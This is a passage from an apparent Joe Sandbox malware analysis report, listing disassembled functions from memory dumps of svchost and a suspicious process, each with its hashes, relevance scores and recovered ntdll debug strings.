                                                                                                                      • Opcode Fuzzy Hash: bdbc6632b6d2436059f58f39b53713e6b7cdf81867513d25cd670efe77ebfd68
                                                                                                                      • Instruction Fuzzy Hash: 9090023521150803D100B25C5588747000687D0301F95D411A042495CDD75A89516121
                                                                                                                      Function 03372CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9745820f4d1af29f2a926b5705e0b38584bc73c5979ab795407e7f9a110cd62e
                                                                                                                      • Instruction ID: 2edcd42a9d33859e667726c679f0cf90a438294e0a2a2d547ede2d87eff31169
                                                                                                                      • Opcode Fuzzy Hash: 9745820f4d1af29f2a926b5705e0b38584bc73c5979ab795407e7f9a110cd62e
                                                                                                                      • Instruction Fuzzy Hash: 9390022561550802D140B25C5498746001687D0301F95D011A0024958DC75D8B5566A1
                                                                                                                      Function 03372C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction ID: c5e339056cf84fcb418ac2a17471c49a8d15cf03a4bc521d87aa7124c24fb37f
                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Function 03372890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: ce988888a268b14dd04c2eed85da2b5b366b868ba12eb108fc93aeff074d0c1c
                                                                                                                      • Instruction ID: 01a02ea5670d7c8590c05c56ab31527f458cd3ad3d67d14d3859eaba1d90497a
                                                                                                                      • Opcode Fuzzy Hash: ce988888a268b14dd04c2eed85da2b5b366b868ba12eb108fc93aeff074d0c1c
                                                                                                                      • Instruction Fuzzy Hash: 7051C6B6A04616BFCB20DB9C8CD097FF7BCFB09201B188569E4A5D7641D238DE54CBA0
                                                                                                                      Function 03367630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 033A4655
                                                                                                                      • Execute=1, xrefs: 033A4713
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033A46FC
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 033A4725
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 033A4787
                                                                                                                      • ExecuteOptions, xrefs: 033A46A0
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 033A4742
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: e009565eb17cf7e0d5f3d495fe25a5838c887fc53bf855ec9a4b625f41186788
                                                                                                                      • Instruction ID: ce14d0e14ea01b27c8ab75d0c4535213292f1beb53462244d55ac030f39fabca
                                                                                                                      • Opcode Fuzzy Hash: e009565eb17cf7e0d5f3d495fe25a5838c887fc53bf855ec9a4b625f41186788
                                                                                                                      • Instruction Fuzzy Hash: 38510635A003196EDB24EBA9DCC5FFE77BCEF05308F4440A9E605AB291E7719A418B50
                                                                                                                      Function 0337B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                      • Instruction ID: 8bcfd3f51f991cd356edf5280008a103a60722e9b52c59641f6da1e6b93e04e0
                                                                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                      • Instruction Fuzzy Hash: B5819074E05289AEDF34CE68C8D17FEFBB5AF45360F1C4259E861AB390C73899408B64
                                                                                                                      Function 0335F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 033A031E
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033A02BD
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033A02E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: 96a16868dc427f3a065347153c68b3478d754fc0e040704174501d28fa99e35b
                                                                                                                      • Instruction ID: 437e2469649998cca6c8fa11ec96c069577005ed4a89f73e452acc863c8f3f77
                                                                                                                      • Opcode Fuzzy Hash: 96a16868dc427f3a065347153c68b3478d754fc0e040704174501d28fa99e35b
                                                                                                                      • Instruction Fuzzy Hash: E8E19C34604B41DFD728CF28C8C4B6AB7E4FB88314F184A69F9A58B6E1D774D945CB42
                                                                                                                      Function 0336BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 033A7BAC
                                                                                                                      • RTL: Resource at %p, xrefs: 033A7B8E
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 033A7B7F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: 778f3610cc060eccc8c9b23e3f192b4477a872bb81f3dde8e82e9c2445b6bc7d
                                                                                                                      • Instruction ID: 7d52cc9a83c15f7016bc0cbcfe147df8626b1fa6f84c5230747718fbedae6495
                                                                                                                      • Opcode Fuzzy Hash: 778f3610cc060eccc8c9b23e3f192b4477a872bb81f3dde8e82e9c2445b6bc7d
                                                                                                                      • Instruction Fuzzy Hash: 3D419D357017029FC724DA6ACCC0B6AF7E9EB88710F144A2DE95ADF690DB71E8058F91
                                                                                                                      Function 0336B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033A728C
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 033A72C1
                                                                                                                      • RTL: Resource at %p, xrefs: 033A72A3
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 033A7294
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: 682e6953a81da2a4605136670f444597cd0ee6ffd89782d769c6e6ade0a1cdb8
                                                                                                                      • Instruction ID: d34ebea0a057e4bc556911e11a4a49b00947e690c439a05b0e144202ace073ce
                                                                                                                      • Opcode Fuzzy Hash: 682e6953a81da2a4605136670f444597cd0ee6ffd89782d769c6e6ade0a1cdb8
                                                                                                                      • Instruction Fuzzy Hash: 5641FF35B00B06AFC721DE69CCC1B6AF7A9FF84710F144629F995EB640DB21E8528BD1
                                                                                                                      Function 03377D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                      • Instruction ID: 1188f55f68dda7790c844437d2a5ac53c625de06af632b470c95c1bf52cf1a6b
                                                                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                      • Instruction Fuzzy Hash: 1991B270E0021A9BDB34DF69CDC5ABEB7A5EF44320F18461AE865EB6D0D73C9942CB50
                                                                                                                      Function 03339126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: 3b5e93385d0931a11f200563d9383557f7ba7e5ae91807c694ff7a3b18fa2e13
                                                                                                                      • Instruction ID: 23aeeb79664e049d612244274ce86437f384dfee2462f3e96e639fcc59e62424
                                                                                                                      • Opcode Fuzzy Hash: 3b5e93385d0931a11f200563d9383557f7ba7e5ae91807c694ff7a3b18fa2e13
                                                                                                                      • Instruction Fuzzy Hash: 55811976D01669DBDB31DF54CC84BEAB7B8AB08710F0445EAA919B7680D7709E84CFA0

                                                                                                                      Executed Functions

                                                                                                                      Function 0398CBFF Relevance: .1, Instructions: 130COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_38a0000_fWXPcgRbOhi.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 22f2dcfcb25aba067a814f11a1d96d80ed2d73b87a6c59f355fef028be5f3075
                                                                                                                      • Instruction ID: 5fa931bc20f56c582ac58f4bd038e728be6c57541fcaa67c23e096157d945fb7
                                                                                                                      • Opcode Fuzzy Hash: 22f2dcfcb25aba067a814f11a1d96d80ed2d73b87a6c59f355fef028be5f3075
                                                                                                                      • Instruction Fuzzy Hash: 3F410FB1D11219AFDB04DF99C881AEEBBBDFF48710F10455AF918EA240E7B09640CBA0
                                                                                                                      Function 039B1B3F Relevance: .1, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_38a0000_fWXPcgRbOhi.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c4b5dde4292d8bd141332b08820f984e6796854d3278e0760786477577101400
                                                                                                                      • Instruction ID: 93eab9373a98713409018025e0c64a12600f7f7e08d475cfdbce9122d0702b0d
                                                                                                                      • Opcode Fuzzy Hash: c4b5dde4292d8bd141332b08820f984e6796854d3278e0760786477577101400
                                                                                                                      • Instruction Fuzzy Hash: BD31D5B5A01248AFCB14DF99D881EEFB7B9EF88300F108219FD19A7344D770A941CBA5
                                                                                                                      Function 039B13CF Relevance: .1, Instructions: 65COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_38a0000_fWXPcgRbOhi.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 625aa0e083c8110b82349dd503bb6bfb6c619c5b9da70aaf189952a9dff545b8
                                                                                                                      • Instruction ID: e11dac7905955e5f56e8ca334a7083758156eeba36347fee7a493d5c165bd62c
                                                                                                                      • Opcode Fuzzy Hash: 625aa0e083c8110b82349dd503bb6bfb6c619c5b9da70aaf189952a9dff545b8
                                                                                                                      • Instruction Fuzzy Hash: B9118B75600358ABD710EB99CC41EEF77BDEF85700F00454AFE595B280E7B0A9058BA1
                                                                                                                      Function 0398CBF0 Relevance: .1, Instructions: 56COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_38a0000_fWXPcgRbOhi.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1c787d40cebf937d6d013878649cfeb97ead631b527a854cabbc23303256768c
                                                                                                                      • Instruction ID: f9671f9aa99ceaba7d5da2309343b26ac0e1ecb02e26832b593f05467ec3e29e
                                                                                                                      • Opcode Fuzzy Hash: 1c787d40cebf937d6d013878649cfeb97ead631b527a854cabbc23303256768c
                                                                                                                      • Instruction Fuzzy Hash: 3F11D6B1D61329AFCB44DFADD98059EBBF8FB49A20F10865BE818EB200D37146518FD4
                                                                                                                      Function 039A0BEF Relevance: .0, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_38a0000_fWXPcgRbOhi.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 836ef97ef0044554f17794ef0ec89c49872a50a389f910a859190b855c0a2bde
                                                                                                                      • Instruction ID: 4e4f7315c309014941761d4ce3f169810fbfe8e4c64df30a17503ea3593ecaa7
                                                                                                                      • Opcode Fuzzy Hash: 836ef97ef0044554f17794ef0ec89c49872a50a389f910a859190b855c0a2bde
                                                                                                                      • Instruction Fuzzy Hash: 9CF0A771C0520CEBDB14DF68D841BDDBBB8EB44320F1043ADE825DB2C0E63597908781
                                                                                                                      Function 039A0BEC Relevance: .0, Instructions: 27COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_38a0000_fWXPcgRbOhi.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7f62ddc752b901bdf3d5647055eb6c13f935d8e91278980eb3dd580e7093574f
                                                                                                                      • Instruction ID: 8696e6f8ce40d463226e994fd8016aebaa18912c185053d91c79e05eaf7b4a0b
                                                                                                                      • Opcode Fuzzy Hash: 7f62ddc752b901bdf3d5647055eb6c13f935d8e91278980eb3dd580e7093574f
                                                                                                                      • Instruction Fuzzy Hash: 17F06571915108EBDB14CF64D841ADDBBB8EB45350F10436EE815DB240D23587908740